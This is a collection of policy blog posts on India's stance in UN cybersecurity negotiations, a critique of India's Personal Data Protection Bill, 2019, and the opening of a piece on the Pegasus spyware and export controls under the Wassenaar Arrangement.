Conversely, India’s participation at international cybersecurity processes like the United Nations’ Group of Governmental Experts (“GGEs”) and the Open-ended Working Groups (“OEWG”) remains less developed. It does not reflect its status as a digital deciding swing State in cyber norms processes. Some describe it as lacking cohesion, without substantive or long term commitment to advance an international agenda. They have further characterised India’s position as one of silence, ambiguity and prioritising immediate national interest. India has even shied away from supporting multistakeholder led norms packages on international cybersecurity such as the Paris Call for Trust and Security in Cyberspace. And this perceived positional ambiguity is further reinforced by the fact that it supported both Russia’s proposal for the first OEWG and the US’ proposal for the sixth GGE. India has also endorsed Russia’s proposal for an ad-hoc committee for a cybercrime convention under the United Nations General Assembly’s Third Committee on Social, Humanitarian and Cultural Issues.

Indian Statements on International Security and ICTs

Given that India has an opportunity to assume an internationally significant role in international cybersecurity and norms related debates under processes like the 2nd OEWG, this post attempts to extract and infer meaning from India’s seemingly inconsistent and ambiguous positions. This involves an analysis of publicly available evidence of India’s participation in working groups and other forums within the UN. Subsequent takeaways reflect a composite examination of:

  1. India’s 2015 Comments to UNGA Resolution 70/237, which endorsed the GGE-developed international framework for responsible state behaviour in the cyberspace;
  2. India’s statement at the June 2019 Organisational Session of the first OEWG;
  3. India’s 2020 comments on the initial pre-draft of the OEWG’s report. These comments have been taken down from the OEWG website.
  4. February 2021 comments/remarks and proposed edits (January 2021) by the Government of India on the zero draft of the OEWG’s final substantive report.
  5. India’s statement at the UNSC Open Debate on international cybersecurity (June 2021).

While the Indian delegation participated in the first substantive session of the 2nd OEWG in December 2021, its interventions are, as of writing, unavailable on the OEWG’s website. Based on an overview of the aforementioned statements five key trends emerge.

First, the Indian Government appears to prefer state-led solutions over multistakeholderism to cybersecurity. While broadly highlighting the importance of multistakeholderism within internet governance, India’s 2015 submission at the UNGA has argued that governments play a primary role in cybersecurity since it falls within the umbrella of ‘national security’. India has also made explicit recommendations at the OEWG negotiations to remove references to “human-centric” approaches to replace them with terms like “peace and stability”. Such statements convey a top-down outlook to ICT and cybersecurity policy. India prefers stakeholders play a secondary role in cybersecurity policy as stated in its intervention at the UNSC. The Indian Foreign Secretary, at the UNSC, opined that stakeholders can play an important role in supporting international cooperation on cybersecurity.

Such positions are consistent with the Indian Government’s disposition that technology environments should adhere to the rule of law and policies framed by appropriate government authorities. Even so, domestically, the Indian government has demonstrated a willingness to participate in multistakeholder dialogue (at forums like India IGF) and seek stakeholder inputs on related policy matters.

Second, India aims to bring content, behaviour and speech over social media and the wider internet within the scope of international cyber security. When discussing the scope of cyber/information security, India has repeatedly referred to cyber terrorism, terrorist content, virulent propaganda, inciting speech, disinformation, terror financing and recruitment activities, and general misuse of social media. This is of course consistent with its domestic policy stance on stricter regulations for social media intermediaries under the 2021 intermediary guidelines and digital media ethics code. India has even called for international dialogue and cooperation to counter terror propaganda, remove content and real time support with investigations. It has called upon the international community to recognise cyber terrorism as a special class of cyber incident which requires stronger international cooperation. As discussed in Part 1 of this series, the OEWG may be receptive to broadening the scope of information security to include issues relating to online speech and social media. This is also evidenced by the fact that several States have raised similar issues during the first substantive session of the 2nd OEWG in December 2021.

Third, India appears to prefer an internationally binding rules-based framework on ICTs and cyberspace. This is evident from both India’s 2021 submission to the OEWG, and its 2021 intervention at the UNSC’s open debate on cybersecurity. These submissions confirm that India appears open to a treaty/convention-based pathway to international cybersecurity. At the same time, during the 2021 OEWG negotiations India categorically requested deleting a paragraph which refers to a 2015 proposal for international code of conduct for information security. The 2015 proposal was tabled by UN Member States who are also members of the Shanghai Cooperation Organisation (“SCO”). Notably, India joined the SCO a few months after the bloc tabled its 2015 proposal. The SCO’s proposal was largely steered under Russian and Chinese guidance.

Fourth, Indian interventions have laid heavy emphasis on supply chain security of ICT products and services. India’s interventions focus on two key aspects. First is an emphasis on cybersecurity resilience and hygiene among SMEs and children. The reference to SMEs can be considered an expression of its economic aspirations via digital transformation. Second, India has called for greater international cooperation on matters surrounding trusted ICT products and services, and trusted suppliers of such products and services. This includes mitigating the introduction of harmful hidden functions like backdoors within ICT products and services which can compromise essential networks. To this end, India has even called for the introduction of a new cyber norm relating to a standard for essential security in cyberspace. This position appears to align itself with recent mandatory testing and certification regulations for telecommunications equipment, and a more recent national security directive passed by Indian telecom authorities in response to growing concerns of Chinese presence in Indian telecom and ICT systems. Under this Directive, Indian telecom authorities have launched the ‘Trusted Telecom Portal’ which aims to ensure that Indian telecom networks only comprise equipment which are deemed to be ‘trusted products’ from ‘trusted sources’. Recent reports also reveal that the Indian Government is in the process of establishing a unified national cyber security task force which will set up a specialised sub department to focus on cyber threats in the telecom sector.

Lastly, on the applicability of international law to States’ use of ICTs—despite its participation in five out of six UN GGEs and the first OEWG—India has yet to substantively articulate an extensive position on this topic. Instead, it has made broader calls for non-binding, voluntary guidance from the international community on the application of key concepts within international humanitarian law like distinction, necessity, proportionality and humanity within the context of ICTs. India’s most animated interventions have pertained to jurisdiction and sovereignty. To be clear, it has not engaged on whether sovereignty is a principle or a rule of international law. Instead, it has called on the international community to reimagine sovereignty and jurisdiction—where a new technical basis (beyond territoriality) can allow States to effectively govern and secure cyberspace.

One such basis for sovereignty that India put forth before the OEWG relates to data ownership and sovereignty. It purports that such a philosophical underpinning would endorse people’s right to informational privacy online.  Yet, these positions reflect and seek to legitimise wider trends in digital and ICT policymaking in India. This includes proposals to restrict cross-border data flows for different purposes and its challenges with carrying out law enforcement investigations owing to lethargic international cooperation via the MLAT frameworks.

Conclusion

India’s current engagement with international cybersecurity issues serves as a mirror for India’s domestic political economy and immediate national interests. Given that it occupies a pivotal position as a digital swing state with the second largest internet user base in the world, India could have the geopolitical heft to steer the conversation away from ideological fault lines—and towards more substantive avenues.

However, in order to do this, it must adopt a more internationalised agenda while negotiating in these cyber norms processes. Since it is still early days when it comes to substantive discussions at the 2nd OEWG, and negotiations at other forthcoming processes are yet to commence, the time may be ripe for India to start formulating a more cohesive strategy in how it engages with international cyber norms processes.

To this end, Indian leadership could approach the forthcoming National Cyber Security Strategy as a jumping off point from via which it can refine the Government’s normative outlook to matters relating to international cybersecurity, international law and responsible state behaviour in the cyberspace. The forthcoming strategy could also help the Government of India define how it collaborates with other States and non-governmental stakeholders. Finally, it could help identify domestic laws, policies and institutions that require reform to keep pace with international developments.

Cyber Security at the UN: Where Does India Stand? (Part 1)

Editorial Note: This is a two-part series, which examines India’s participation in UN-affiliated processes and debates on ICTs and international security

Part 1 provides an overview of the ideological divisions that are shaping UN debates around the international framework for responsible state behaviour in the cyberspace. In Part 2, the author will critique India’s stated positions on ICTs and international security at forums affiliated with the UN. 

Author: Sidharth Deb

Introduction: The International Character of Cyber Threats 

Earlier this month, the United Nations General Assembly’s (“UNGA”) First Committee on Disarmament and International Security (“First Committee”) convened Member-States for the first substantive session of its second Open-Ended Work Group (“OEWG”) on security of, and in the use of, information and communication technologies (“ICTs”). The 2nd OEWG serves as the latest working group under the aegis of the UNGA First Committee on themes relating to ICTs and international cybersecurity. It is notable that in that same week another major cyber vulnerability, in a widely used logging library—the Apache Log4j flaw—threatening global computer systems, came to light. This vulnerability has been described as a major software supply chain flaw which can be used to remotely compromise hundreds of millions of vulnerable devices globally.  

Experts are calling it a cyber pandemic and exploits are already targeting corporate networks globally. More concerning is the fact that nation State-backed hackers have reportedly begun experimenting and launching malicious operations to exploit the flaw. Along with recent incidents like WannaCryNotPetyaSolarWindsColonial Pipeline and the Microsoft Exchange Server, such trends typify a rapidly evolving and increasingly scalable cyber threat landscape which emerge from heterogenous sources. These include States which use ICT capabilities to advance military or political objectives, States-sponsored hacking groups, mercenary technology vendors (developing tools like spyware), and other criminal and/or terrorist non-State actors. To combat these trends the international community must prioritise cyber diplomacy, international cooperation, assistance and baseline harmonisation of jurisdictional efforts as essential prerequisites.  

However, this is challenging since States often have diverging political, economic, developmental and military objectives. Therefore, in order to fulfil the core objective of a peaceful and stable cyberspace, international dialogue on ICT security must successfully navigate both peacetime and conflict paradigms. This includes working around innate complexities conferred via inter-State cyber conflicts. One such challenge relates to the operationalisation of the law of armed conflict within the cyberspace. Keeping these challenges in mind, this post presents an overview of ongoing cyber diplomacy efforts at the UN towards building an international legal and normative framework for responsible state behaviour in the cyberspace. It then evaluates how ideological divisions between countries pose challenges to international consensus and multilateralism. 

The UN, Cybersecurity and the Framework for Responsible State Behaviour 

Against the aforementioned backdrop, the second OEWG commences the next generation of deliberations on the States’ use of ICTs in the context of international peace and security. This Working Group was constituted in accordance with a UNGA resolution (75/240) dated December 31, 2020 and is set to run till 2025. It is open to participation from all 193 UN Member States, and the OEWG’s Chair is in the midst of determining the extent and mechanisms of multistakeholder participation. Both this and the first iteration of the OEWG involve more inclusive participation of the international community as compared to previous Groups of Governmental Experts (“GGEs”) on ICT security, which had only 15 to 25 participating States.  

Given the exponential innovation trajectories of ICT environments and the extended operational timelines, it will be tall order for the 2nd OEWG to fulfil its mandate to identify existing and potential threats to information security. Yet, it is not starting from scratch. Concerted prior work at the GGEs and OEWG, along with subsequent consensus at the UNGA has yielded an international framework for responsible state behaviour towards international cybersecurity. The framework comprises four distinct yet complementary pillars. These pillars include: 

  1. International law, including the UN Charter along with existing principles of international law, as it applies to States’ use of ICTs. This was most recently elaborated in the May 2021 consensus report of the 6th GGE.; 
  1. Politically determined cyber norms which entail voluntary and non-binding norms, rules and principles of responsible State behaviour during peacetime. The norms, inter alia, include interstate cooperation like exchange of information and threat intelligence; attribution of ICT incidents, respecting human rights; protecting critical infrastructures; securing ICT supply chains; enabling ICT vulnerability disclosures; preventing the misuse of ICTs for cybercrime and international wrongful acts; etc. Cyber norms are meant to promote cooperation and increase predictability, reduce risks of misperception and escalation in the cyberspace, and serve as a first step to the eventual formation of customary international law in the cyberspace. 
  1. The other two pillars are confidence building measures and capacity building. These aim to enhance interstate transparency, international and institutional (technical and policy) cooperation, systematise international assistance to implement the voluntary cyber norms framework, and create a baseline of competence and response capabilities across Member States.  

Prima facie these pillars reflect a comprehensive approach in tackling the wide-ranging threats in cyberspace. Yet it does not reflect geopolitical divisions which are emerging within different country blocs. Since cybersecurity’s prominence within the broader scheme of international peace and security continues to increase, it is important to track this aspect of international cyberspace cooperation.  

Ideological Divisions in International Cybersecurity Processes 

Ideological divisions within international cybersecurity processes often reflect similar geographic groupings. One side comprises the US, UK, Estonia and other NATO allies. On the other end of the spectrum, we observe a Sino-Russian grouping which also includes countries like Cuba and Iran. This section highlights four main ways in which ideological divisions are shaping the international cyber diplomacy processes. 

  1. Goal of Dialogue: Legally Binding Agreement or Voluntary Politically-determined Norms-based Framework? 

Differences begin at the most fundamental levels of implementation. Consider the means of operationalising the international framework for state responsibility in the use of ICTs. Since the late 90s, the Russian bloc has made multiple proposals for international work towards a binding treaty/convention on international cybersecurity and cybercrime. Such proposals advance Sino-Russian objectives of embedding core principles of internet sovereignty and state-primacy within a rule-based framework of international ICT policy. Interests around sovereignty may have also motivated the Russian proposal to set up the first UN OEWG on ICT Security, which opened up conversations in cybersecurity to all UN Member States. While the OEWG furthers openness, transparency and inclusivity towards norm formulation, the push for expansion in participation is perhaps motivated by an ability to bring more countries with similar ideological positions into the discussions.  

Among other things, their inclusion can create greater momentum to revisit, expand, or create new norms for State activities in cyberspace. The US and NATO bloc has strongly opposed the need for an international treaty based framework citing that such an approach could risk allowing States to negotiate and dilute core principles like openness, interoperability, multistakeholderism and respect for human rights. At a secondary level, it could also lead to greater fetters and regulation of international transnational ICT/internet corporations—which tend to be concentrated in certain jurisdictions.  

  1. Disputes on Applicability of International Law 

A prominent example here is the failed negotiations at the 5th UN GGE in 2017. An important point of contention related to whether and how international law—especially international humanitarian law—applies to the cyberspace. In broad terms, NATO allies advocated that the principles of use of force, self-defence, and in situations of conflict, principles of international humanitarian law, should apply to the cyberspace. However, Cuba, serving as a front for the other bloc, opposed this. They argued that this would serve as a tacit endorsement of certain cyber operations and would incentivise escalation/militarisation in the cyberspace. This was the straw that broke the camel’s back, and it cost the international community consensus at the 5th GGE.  

  1. Procedural Mechanisms and Modalities of Dialogue  

Since 2017, both the 1st OEWG and 6th GGE successfully adopted consensus reports in March and May 2021 respectively. While they build on prior GGE consensus reports especially the 2013 and 2015 reports, the aforementioned disputes demonstrate the fragility of consensus on international cybersecurity at the UN.  

Even in the run-up to the 2nd OEWG’s first substantive session (December 2021), States have had disagreements on the modalities of engagement. These include whether the OEWG should have broad conversations on all issues simultaneously between Member States, or if the Chair should set up issue-specific thematic subgroups for different aspects of international cybersecurity, etc.  

  1. Definitional Scope of Key Concepts including “Information” Security 

Fundamental differences on key concepts like minimum identifiable standards of inter-State conduct, verification, evidence gathering, attribution and accountability among both State and non-State actors, threaten the international framework for peace and stability in cyberspace. A major point of contention which could emerge within the 2nd OEWG relates to its mandate on identifying existing and potential threats to information security. In contrast to the GGEs, the OEWG is increasing its focus on disinformation, defamation, incitement, propaganda, terrorist content, and other online speech/media. This can be discerned from the 1st OEWG’s final substantive report, the Chair’s Summary, and UNGA Res/75/240. The OEWG’s eventual scope of “information security” will also reveal to what extent international policymakers aim to securitise different infrastructure and online public spaces within ICT environments. Given the implications that this could have on principles like openness, interoperability, and people’s fundamental freedoms and human rights, dialogue on this front will be important to track.

Conclusion: The Importance of Digital Swing States 

Substantive fissures threaten multilateral international cooperation in cybersecurity. This risk manifested once with the operation of parallel processes at the 6th GGE and the 1st OEWG. Similar risks of fragmentation could emerge during the 2nd OEWG’s tenure—since there is already an adhoc committee on a cybercrime convention which will commence substantive discussions under the UNGA’s Third Committee in January 2022. States including France, Egypt and others have also made a proposal for an action oriented Programme of Action to advance responsible state behaviour in the cyberspace.  

Given these risks, commentators observe that the role of swing states is integral for international cyber diplomacy to steer the conversations towards more substantive pathways. One such swing State is India. The next post of this two part series will explore India’s engagement with UN-affiliated processes and debates on cybersecurity over time. Through this, we gain greater clarity on India’s definitional approach to cybersecurity, views on multistakeholderism vis-a-vis cybersecurity, supply chain security, and sovereignty in ICT environments.  

Reflections on Personal Data Protection Bill, 2019

By Sangh Rakshita and Nidhi Singh

Image result for data protection"

 The Personal Data Protection Bill, 2019 (PDP Bill/ Bill) was introduced in the Lok Sabha on December 11, 2019 , and was immediately referred to a joint committee of the Parliament. The joint committee published a press communique on February 4, 2020 inviting comments on the Bill from the public.

The Bill is the successor to the Draft Personal Data Protection Bill 2018 (Draft Bill 2018), recommended by a government appointed expert committee chaired by Justice B.N. Srikrishna. In August 2018, shortly after the recommendations and publication of the draft Bill, the Ministry of Electronics and Information Technology (MeitY) invited comments on the Draft Bill 2018 from the public. (Our comments are available here.)[1]

In this post we undertake a preliminary examination of:

  • The scope and applicability of the PDP Bill
  • The application of general data protection principles
  • The rights afforded to data subjects
  • The exemptions provided to the application of the law

In future posts in the series we will examine the Bill and look at the:

  • The restrictions on cross border transfer of personal data
  • The structure and functions of the regulatory authority
  • The enforcement mechanism and the penalties under the PDP Bill

Scope and Applicability

The Bill identifies four different categories of data. These are personal data, sensitive personal data, critical personal data and non-personal data

Personal data is defined as “data about or relating to a natural person who is directly or indirectly identifiable, having regard to any characteristic, trait, attribute or any other feature of the identity of such natural person, whether online or offline, or any combination of such features with any other information, and shall include any inference drawn from such data for the purpose of profiling. (emphasis added)

The addition of inferred data in the definition realm of personal data is an interesting reflection of the way the conversation around data protection has evolved in the past few months, and requires further analysis.

Sensitive personal data is defined as data that may reveal, be related to or constitute a number of different categories of personal data, including financial data, health data, official identifiers, sex life, sexual orientation, genetic data, transgender status, intersex status, caste or tribe, and religious and political affiliations / beliefs. In addition, under clause 15 of the Bill the Central Government can notify other categories of personal data as sensitive personal data in consultation with the Data Protection Authority and the relevant sectoral regulator.

Similar to the 2018 Bill, the current bill does not define critical personal data and clause 33 provides the Central Government the power to notify what is included under critical personal data. However, in its report accompanying the 2018 Bill, the Srikrishna committee had referred to some examples of critical personal data that relate to critical state interest like Aadhaar number, genetic data, biometric data, health data, etc.

The Bill retains the terminology introduced in the 2018 Draft Bill, referring to data controllers as ‘data fiduciaries’ and data subjects ‘data principals’. The new terminology was introduced with the purpose of reflecting the fiduciary nature of the relationship between the data controllers and subjects. However, whether the use of the specific terminology has more impact on the protection and enforcement of the rights of the data subjects still needs to be seen.

 Application of PDP Bill 2019

The Bill is applicable to (i) the processing of any personal data, which has been collected, disclosed, shared or otherwise processed in India; (ii) the processing of personal data by the Indian government, any Indian company, citizen, or person/ body of persons incorporated or created under Indian law; and (iii) the processing of personal data in relation to any individuals in India, by any persons outside of India.

The scope of the 2019 Bill, is largely similar in this context to that of the 2018 Draft Bill. However, one key difference is seen in relation to anonymised data. While the 2018 Draft Bill completely exempted anonymised data from its scope, the 2019 Bill does not apply to anonymised data, except under clause 91 which gives the government powers to mandate the use and processing of non-personal data or anonymised personal data under policies to promote the digital economy. There are a few concerns that arise in context of this change in treatment of anonymised personal data. First, there are concerns on the concept of anonymisation of personal data itself. While the Bill provides that the Data Protection Authority (DPA) will specify appropriate standards of irreversibility for the process of anonymisation, it is not clear that a truly irreversible form of anonymisation is possible at all. In this case, we need more clarity on what safeguards will be applicable for the use of anonymised personal data.

Second, is the Bill’s focus on the promotion of the digital economy. We have previously discussed some of the concerns regarding focus on the promotion of digital economy in a rights based legislation in our comments to the Draft Bill 2018.

These issues continue to be of concern, and are perhaps heightened with the introduction of a specific provision on the subject in the 2019 Bill (especially without adequate clarity on what services or policy making efforts in this direction, are to be informed by the use of anonymised personal data). Many of these issues are also still under discussion by the committee of experts set up to deliberate on data governance framework (non-personal data). The mandate of this committee includes the study of various issues relating to non-personal data, and to make specific suggestions for consideration of the central government on regulation of non-personal data.

The formation of the non-personal data committee was in pursuance of a recommendation by the Justice Srikrishna Committee to frame a legal framework for the protection of community data, where the community is identifiable. The mandate of the expert committee will overlap with the application of clause 91(2) of the Bill.

Data Fiduciaries, Social Media Intermediaries and Consent Managers

Data Fiduciaries

As discussed above the Bill categorises data controllers as data fiduciaries and significant data fiduciaries. Any person that determines the purpose and means of processing of personal data, (including the State, companies, juristic entities or individuals) is considered a data fiduciary. Some data fiduciaries may be notified as ‘significant data fiduciaries’, on the basis of factors such as the volume and sensitivity of personal data processed, the risks of harm etc. Significant data fiduciaries are held to higher standards of data protection. Under clauses 27-30, significant data fiduciaries are required to carry out data protection impact assessments, maintain accurate records, audit policy and the conduct of its processing of personal data and appoint a data protection officer. 

Social Media Intermediaries

The Bill introduces a distinct category of intermediaries called social media intermediaries. Under clause 26(4) a social media intermediary is ‘an intermediary who primarily or solely enables online interaction between two or more users and allows them to create, upload, share, disseminate, modify or access information using its services’. Intermediaries that primarily enable commercial or business-oriented transactions, provide access to the Internet, or provide storage services are not to be considered social media intermediaries.

Social media intermediaries may be notified to be significant data fiduciaries, if they have a minimum number of users, and their actions have or are likely to have a significant impact on electoral democracy, security of the State, public order or the sovereignty and integrity of India.

Under clause 28 social media intermediaries that have been notified as a significant data fiduciaries will be required to provide for voluntary verification of users to be accompanied with a demonstrable and visible mark of verification.

Consent Managers

The Bill also introduces the idea of a ‘consent manager’ i.e. a (third party) data fiduciary which provides for management of consent through an ‘accessible, transparent and interoperable platform’. The Bill does not contain any details on how consent management will be operationalised, and only states that these details will be specified by regulations under the Bill. 

Data Protection Principles and Obligations of Data Fiduciaries

Consent and grounds for processing

The Bill recognises consent as well as a number of other grounds for the processing of personal data.

Clause 11 provides that personal data shall only be processed if consent is provided by the data principal at the commencement of processing. This provision, similar to the consent provision in the 2018 Draft Bill, draws from various principles including those under the Indian Contract Act, 1872 to inform the concept of valid consent under the PDP Bill. The clause requires that the consent should be free, informed, specific, clear and capable of being withdrawn.

Moreover, explicit consent is required for the processing of sensitive personal data. The current Bill appears to be silent on issues such as incremental consent which were highlighted in our comments in the context of the Draft Bill 2018.

The Bill provides for additional grounds for processing of personal data, consisting of very broad (and much criticised) provisions for the State to collect personal data without obtaining consent. In addition, personal data may be processed without consent if required in the context of employment of an individual, as well as a number of other ‘reasonable purposes’. Some of the reasonable purposes, which were listed in the Draft Bill 2018 as well, have also been a cause for concern given that they appear to serve mostly commercial purposes, without regard for the potential impact on the privacy of the data principal.

In a notable change from the Draft Bill 2018, the PDP Bill, appears to be silent on whether these other grounds for processing will be applicable in relation to sensitive personal data (with the exception of processing in the context of employment which is explicitly barred).

Other principles

The Bill also incorporates a number of traditional data protection principles in the chapter outlining the obligations of data fiduciaries. Personal data can only be processed for a specific, clear and lawful purpose. Processing must be undertaken in a fair and reasonable manner and must ensure the privacy of the data principal – a clear mandatory requirement, as opposed to a ‘duty’ owed by the data fiduciary to the data principal in the Draft Bill 2018 (this change appears to be in line with recommendations made in multiple comments to the Draft Bill 2018 by various academics, including our own).

Purpose and collection limitation principles are mandated, along with a detailed description of the kind of notice to be provided to the data principal, either at the time of collection, or as soon as possible if the data is obtained from a third party. The data fiduciary is also required to ensure that data quality is maintained.

A few changes in the application of data protection principles, as compared to the Draft Bill 2018, can be seen in the data retention and accountability provisions.

On data retention, clause 9 of the Bill provides that personal data shall not be retained beyond the period ‘necessary’ for the purpose of data processing, and must be deleted after such processing, ostensibly a higher standard as compared to ‘reasonably necessary’ in the Draft Bill 2018. Personal data may only be retained for a longer period if explicit consent of the data principal is obtained, or if retention is required to comply with law. In the face of the many difficulties in ensuring meaningful consent in today’s digital world, this may not be a win for the data principal.

Clause 10 on accountability continues to provide that the data fiduciary will be responsible for compliance in relation to any processing undertaken by the data fiduciary or on its behalf. However, the data fiduciary is no longer required to demonstrate such compliance.

Rights of Data Principals

Chapter V of the PDP Bill 2019 outlines the Rights of Data Principals, including the rights to access, confirmation, correction, erasure, data portability and the right to be forgotten. 

Right to Access and Confirmation

The PDP Bill 2019 makes some amendments to the right to confirmation and access, included in clause 17 of the bill. The right has been expanded in scope by the inclusion of sub-clause (3). Clause 17(3) requires data fiduciaries to provide data principals information about the identities of any other data fiduciaries with whom their personal data has been shared, along with details about the kind of data that has been shared.

This allows the data principal to exert greater control over their personal data and its use.  The rights to confirmation and access are important rights that inform and enable a data principal to exercise other rights under the data protection law. As recognized in the Srikrishna Committee Report, these are ‘gateway rights’, which must be given a broad scope.

Right to Erasure

The right to correction (Clause 18) has been expanded to include the right to erasure. This allows data principals to request erasure of personal data which is not necessary for processing. While data fiduciaries may be allowed to refuse correction or erasure, they would be required to produce a justification in writing for doing so, and if there is a continued dispute, indicate alongside the personal data that such data is disputed.

The addition of a right to erasure, is an expansion of rights from the 2018 Bill. While the right to be forgotten only restricts or discontinues disclosure of personal data, the right to erasure goes a step ahead and empowers the data principal to demand complete removal of data from the system of the data fiduciary.

Many of the concerns expressed in the context of the Draft Bill 2018, in terms of the procedural conditions for the exercise of the rights of data principals, as well as the right to data portability specifically, continue to persist in the PDP Bill 2019.

Exceptions and Exemptions

While the PDP Bill ostensibly enables individuals to exercise their right to privacy against the State and the private sector, there are several exemptions available, which raise several concerns.

The Bill grants broad exceptions to the State. In some cases, it is in the context of specific obligations such as the requirement for individuals’ consent. In other cases, State action is almost entirely exempted from obligations under the law. Some of these exemptions from data protection obligations are available to the private sector as well, on grounds like journalistic purposes, research purposes and in the interests of innovation.

The most concerning of these provisions, are the exemptions granted to intelligence and law enforcement agencies under the Bill. The Draft Bill 2018, also provided exemptions to intelligence and law enforcement agencies, so far as the privacy invasive actions of these agencies were permitted under law, and met procedural standards, as well as legal standards of necessity and proportionality. We have previously discussed some of the concerns with this approach here.

The exemptions provided to these agencies under the PDP Bill, seem to exacerbate these issues.

Under the Bill, the Central Government can exempt an agency of the government from the application of this Act by passing an order with reasons recorded in writing if it is of the opinion that the exemption is necessary or expedient in the interest of sovereignty and integrity, security of the state, friendly relations with foreign states, public order; or for preventing incitement to the commission of any cognizable offence relating to the aforementioned grounds. Not only have the grounds on which government agencies can be exempted been worded in an expansive manner, the procedure of granting these exemptions also is bereft of any safeguards.

The executive functioning in India suffers from problems of opacity and unfettered discretion at times, which requires a robust system of checks and balances to avoid abuse. The Indian Telegraph Act, 1885 (Telegraph Act) and the Information Technology Act, 2000 (IT Act) enable government surveillance of communications made over telephones and the internet. For drawing comparison here, we primarily refer to the Telegraph Act as it allows the government to intercept phone calls on similar grounds as mentioned in clause 35 of the Bill by an order in writing. However, the Telegraph Act limits the use of this power to two scenarios – occurrence of a public emergency or in the interest of public safety. The government cannot intercept communications made over telephones in the absence of these two preconditions. The Supreme Court in People’s Union for Civil Liberties v. Union of India, (1997) introduced guidelines to check abuse of surveillance powers under the Telegraph Act which were later incorporated in Rule 419A of the Indian Telegraph Rules, 1951. A prominent safeguard included in Rule 419A requires that surveillance and monitoring orders be issued only after considering ‘other reasonable means’ for acquiring the required information. The court had further limited the scope of interpretation of ‘public emergency’ and ‘public safety’ to mean “the prevalence of a sudden condition or state of affairs affecting the people at large and calling for immediate action”, and “the state or condition of freedom from danger or risk at large” respectively. In spite of the introduction of these safeguards, the procedure of intercepting telephone communications under the Telegraph Act is criticised for lack of transparency and improper implementation. For instance, a 2014 report revealed that around 7500 – 9000 phone interception orders were issued by the Central Government every month. The application of procedural safeguards, in each case would have been physically impossible given the sheer numbers. Thus, legislative and judicial oversight becomes a necessity in such cases.

The constitutionality of India’s surveillance apparatus inclduing section 69 of the IT Act which allows for surveillance on broader grounds on the basis of necessity and expediency and not ‘public emergency’ and ‘public safety’, has been challenged before the Supreme Court and is currently pending. Clause 35 of the Bill also mentions necessity and expediency as prerequisites for the government to exercise its power to grant exemption, which appear to be vague and open-ended as they are not defined. The test of necessity, implies resorting to the least intrusive method of encroachment up on privacy to achieve the legitimate state aim. This test is typically one among several factors applied in deciding on whether a particular intrusion on a right is tenable or not, under human rights law. In his concurring opinion in Puttaswamy (I) J. Kaul had included ‘necessity’ in the proportionality test. (However, this test is not otherwise well developed in Indian jurisprudence).  Expediency, on the other hand, is not a specific legal basis used for determining the validity of an intrusion on human rights. It has also not been referred to in Puttaswamy (I) as a basis of assessing a privacy violation. The use of the term ‘expediency’ in the Bill is deeply worrying as it seems to bring down the threshold for allowing surveillance which is a regressive step in the context of cases like PUCL and Puttaswamy (I). A valid law along with the principles of proportionality and necessity are essential to put in place an effective system of checks and balances on the powers of the executive to provide exemptions. It seems unlikely that the clause will pass the test of proportionality (sanction of law, legitimate aim, proportionate to the need of interference, and procedural guarantees against abuse) as laid down by the Supreme Court in Puttaswamy (I).

The Srikrishna Committee report had recommended that surveillance should not only be conducted under law (and not executive order), but also be subject to oversight, and transparency requirements. The Committee had argued that the tests of lawfulness, necessity and proportionality provided for under clauses 42 and 43 (of the Draft Bill 2018) were sufficient to meet the standards set out under the Puttaswamy judgment. Since the PDP Bill completely does away with all these safeguards and leaves the decision to executive discretion, the law is unconstitutional.  After the Bill was introduced in the Lok Sabha, J. Srikrishna had criticised it for granting expansive exemptions in the absence of judicial oversight. He warned that the consequences could be disastrous from the point of view of safeguarding the right to privacy and could turn the country into an “Orwellian State”. He has also opined on the need for a separate legislation to govern the terms under which the government can resort to surveillance.

Clause 36 of the Bill deals with exemption of some provisions for certain processing of personal data. It combines four different clauses on exemption which were listed in the Draft Bill 2018 (clauses 43, 44, 46 and 47). These include processing of personal data in the interests of prevention, detection, investigation and prosecution of contraventions of law; for the purpose of legal proceedings; personal or domestic purposes; and journalistic purposes. The Draft Bill 2018 had detailed provisions on the need for a law passed by Parliament or the State Legislature which is necessary and proportionate, for processing of personal data in the interests of prevention, detection, investigation and prosecution of contraventions of law. Clause 36 of the Bill does not enumerate the need for a law to process personal data under these exemptions. We had argued that these exemptions granted by the Draft Bill 2018 (clauses 43, 44, 46 and 47) were wide, vague and needed clarifications, but the exemptions under clause 36 of the Bill  are even more ambiguous as they merely enlist the exemptions without any specificities or procedural safeguards in place.

In the Draft Bill 2018, the Authority could not give exemption from the obligation of fair and reasonable processing, measures of security safeguards and data protection impact assessment for research, archiving or statistical purposes As per the current Bill, the Authority can provide exemption from any of the provisions of the Act for research, archiving or statistical purposes.

The last addition to this chapter of exemptions is that of creating a sandbox for encouraging innovation. This newly added clause 40 is aimed at encouraging innovation in artificial intelligence, machine-learning or any other emerging technology in public interest. The details of what the sandbox entails other than exemption from some of the obligations of Chapter II might need further clarity. Additionally, to be considered an eligible applicant, a data fiduciary has to necessarily obtain certification of its privacy by design policy from the DPA, as mentioned in clause 40(4) read with clause 22.

Though well appreciated for its intent, this provision requires clarification on grounds of selection and details of what the sandbox might entail.


[1] At the time of introduction of the PDP Bill 2019, the Minister for Law and Justice of India, Mr. Ravi Shankar Prasad suggested that over 2000 inputs were received on the Draft Bill 2018, based on which changes have been made in the PDP Bill 2019. However, these comments and inputs have not been published by MeitY, and only a handful of comments have been published, by the stakeholders submitting these comments themselves.   

The Pegasus Hack: A Hark Back to the Wassenaar Arrangement

By Sharngan Aravindakshan

The world’s most popular messaging application, Whatsapp, recently revealed that a significant number of Indians were among the targets of Pegasus, a sophisticated spyware that operates by exploiting a vulnerability in Whatsapp’s video-calling feature. It has also come to light that Whatsapp, working with the University of Toronto’s Citizen Lab, an academic research organization with a focus on digital threats to civil society, has traced the source of the spyware to NSO Group, an Israeli company well known both for developing and selling hacking and surveillance technology to governments with a questionable record in human rights. Whatsapp’s lawsuit against NSO Group in a federal court in California also specifically alludes to NSO Group’s clients “which include but are not limited to government agencies in the Kingdom of Bahrain, the United Arab Emirates, and Mexico as well as private entities.” The complaint filed by Whatsapp against NSO Group can be accessed here.

In this context, we examine the shortcomings of international efforts in limiting or regulating the transfers or sale of advanced and sophisticated technology to governments that often use it to violate human rights, as well as highlight the often complex and blurred lines between the military and civil use of these technologies by the government.

